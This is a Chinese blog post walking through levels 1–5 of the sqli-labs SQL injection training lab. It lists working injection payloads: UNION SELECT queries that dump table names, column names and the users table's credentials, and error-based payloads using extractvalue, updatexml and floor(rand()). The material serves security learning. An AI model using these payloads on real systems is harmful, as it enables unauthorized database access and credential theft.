sql-lab 1~5

开心星人

已于 2022-05-27 10:32:18 修改

阅读量601

点赞数 1

分类专栏： Web安全 SQL注入文章标签： sql web安全

于 2022-05-12 14:57:22 首次发布

本文链接：https://blog.csdn.net/qq_55675216/article/details/124729330

版权

Web安全同时被 2 个专栏收录

35 篇文章 1 订阅

订阅专栏

SQL注入

19 篇文章 1 订阅

订阅专栏

1

?id=1
在这里插入图片描述

?id=1'
在这里插入图片描述

?id=1'--+
在这里插入图片描述
?id=1' order by 1--+

?id=1' order by 4--+

所以有三个字段

?id=1' union select 1,2,3--+
在这里插入图片描述
因为web页面只能显示一行数据

?id=-1' union select 1,2,3--+
将让第一行数据显示不出来
或者
?id=1' union select 1,2,3 limit 1,1--+
在这里插入图片描述
可以看到有回显的字段2和字段3

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查表名
在这里插入图片描述
看users表吧

?id=-1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+
查users表中的列名
如果过滤了等号= ，可以用like 替换
在这里插入图片描述

-1 ' union select 1,group_concat(username),group_concat(password) from users --+
在这里插入图片描述

2

?id=1'
在这里插入图片描述
?id=1'--+

?id=1 and 1=1

?id=1 and 1=2

所以是数字型注入

然后和上一题操作基本一致，去掉一个单引号即可
-1 union select 1,2,group_concat(0x7e,username,0x7c,password) from users
在这里插入图片描述

3

在这里插入图片描述加了单引号之后还用括号括了起来
?id=-1') union select 1,2,3%23

4

在这里插入图片描述

?id=-1") union select 1,2,3%23
在这里插入图片描述

这几种是比较经典的
’
')
‘))
"
")
"))

5

?id=1
在这里插入图片描述
回显的那两个字段不见了

这一题没有回显但是有报错，我们就需要构造特殊的语句，将数据显示在报错里，来读取数据

MySQL一共有十种报错注入

常用的三种
extractvalue
extractvalue(1,concat(0x7e,(select @@version),0x7e)) 

updatexml 
updatexml(1,concat(0x7e,(select @@version),0x7e),1) 

floor

前两个是通过xpath语法报错，带出信息

?id=1' union select 1,2,3 or extractvalue(1,concat(0x7e,(select database()),0x7e));--+
在这里插入图片描述

?id=1' union select 1,2,3 or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e));--+

?id=1' union select 1,2,3 or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1);--+

用这两种不知道为啥没带出来

用floor试试
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;--+
在这里插入图片描述

?id=1' union select 1,count(*),concat(0x3a,0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;--+
在这里插入图片描述
?id=1' union select 1,count(*),concat(0x3a,0x3a,(select group_concat(column_name) from information_schema.columns where table_name = 'users'),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;--+

在这里插入图片描述

开心星人

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
sql-lab 1~5

1?id=1?id=1'?id=1%27--+?id=1' order by 1--+?id=1' order by 4--+所以有四个字段?id=1' union select 1,2,3--+因为web页面只能显示一行数据?id=-1' union select 1,2,3--+将让第一行数据显示不出来或者?id=1' union select 1,2,3 limit 1,1--+可以看到有回显的字段2和字段3?id=-1' union select 1,2,g
复制链接

扫一扫